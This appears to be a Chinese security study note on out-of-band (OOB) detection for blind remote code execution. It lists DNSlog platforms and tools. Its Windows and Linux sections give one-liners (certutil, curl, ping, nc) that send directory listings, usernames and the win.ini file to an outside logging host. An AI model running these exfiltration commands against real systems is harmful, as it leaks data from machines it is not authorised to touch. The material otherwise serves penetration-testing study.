学习笔记-OOB
OOB
免責(zé)聲明
本文檔僅供學(xué)習(xí)和研究使用,請(qǐng)勿使用文中的技術(shù)源碼用于非法用途,任何人造成的任何負(fù)面影響,與本人無(wú)關(guān).
相關(guān)文章
- 帶外通道技術(shù)(OOB)總結(jié)
- OOB(out of band)分析系列之DNS滲漏
- Burpsuite之BurpCollaborator模塊介紹
- Persistent Access to Burp Suite Sessions - Step-by-Step Guide
- Burp Collaborator
- HTTP BLIND
- Cracking the lens: targeting HTTP's hidden attack-surface
- System Hardening? ?? RCE? ???? ?? OOB ???
- ping 命令跨平臺(tái)探測(cè)無(wú)回顯 RCE 技巧
在線監(jiān)控平臺(tái)
- http://ceye.io/
- https://webhook.site
- http://www.dnslog.cn/
- https://iplogger.org/
- https://log.咕.com/
相關(guān)工具
- uknowsec/SharpNetCheck - 該工具可以在 dnslog 中回顯內(nèi)網(wǎng) ip 地址和計(jì)算機(jī)名,可實(shí)現(xiàn)內(nèi)網(wǎng)中的快速定位可出網(wǎng)機(jī)器
- ztgrace/mole - 識(shí)別和利用out-of-band (OOB)漏洞的burp擴(kuò)展
平臺(tái)搭建
- 十分鐘快速自建DNSlog服務(wù)器
- DNSLOG的快速搭建攻略
- 安全技術(shù)|DNSLOG平臺(tái)搭建從0到1
- 自建DNSLog平臺(tái)
- 快速搭建自用dnslog
平臺(tái)
- BugScanTeam/DNSLog - DNSLog 是一款監(jiān)控 DNS 解析記錄和 HTTP 訪問(wèn)記錄的工具
- lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 編寫(xiě)的監(jiān)控 DNS 解析記錄的工具,自帶 WEB 界面
- chennqqi/godnslogdocker pull "sort/godnslog" docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100 # yourdomain.com 替換為你的域名 100.100.100.100 替換為你的公網(wǎng)IP
- yumusb/DNSLog-Platform-Golang - DNSLOG平臺(tái) golang 一鍵啟動(dòng)版
- phith0n/conote-community - Conote 綜合安全測(cè)試平臺(tái)社區(qū)版
- projectdiscovery/interactsh - An OOB interaction gathering server and client library
- Buzz2d0/Hyuga - 一個(gè)用來(lái)檢測(cè)帶外(Out-of-Band)流量(DNS查詢和HTTP請(qǐng)求)的監(jiān)控工具
- AbelChe/cola_dnslog
- AlphabugX/Alphalog
- Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.
Windows
-
ping
ping %USERNAME%.xxx.ceye.ioping -nc 4 %USERNAME%.xxx.ceye.io -
certutil
使用 certutil 請(qǐng)求證書(shū)文件,并將下載文件重定向到 nul,無(wú)緩存、無(wú)需瀏覽器實(shí)現(xiàn)發(fā)起 http 請(qǐng)求
for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul -
curl
windows 環(huán)境默認(rèn)是支持 curl 的
for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%xcurl -F file=@C:\windows\win.ini http://xxx.ceye.io
linux
-
curl
curl http://xxx.ceye.io/%x -
wget
wget http://xxx.ceye.io/%x -
ping
linux 默認(rèn) ping 不帶 -c 參數(shù)是會(huì)導(dǎo)致無(wú)限ping下去的,一定要帶 -c
ping -c 4 xxx.ceye.ioping -nc 4 xxx.ceye.io -
openssl
openssl s_client -connect xxx.ceye.io:80 -
nc
echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80 -
dig
dig xxx.ceye.io
點(diǎn)擊關(guān)注,共同學(xué)習(xí)!安全狗的自我修養(yǎng)
github haidragon
https://github.com/haidragon
總結(jié)
- 上一篇: leapmotion设备连接Unity3
- 下一篇: Daniel Jeffries:为什么我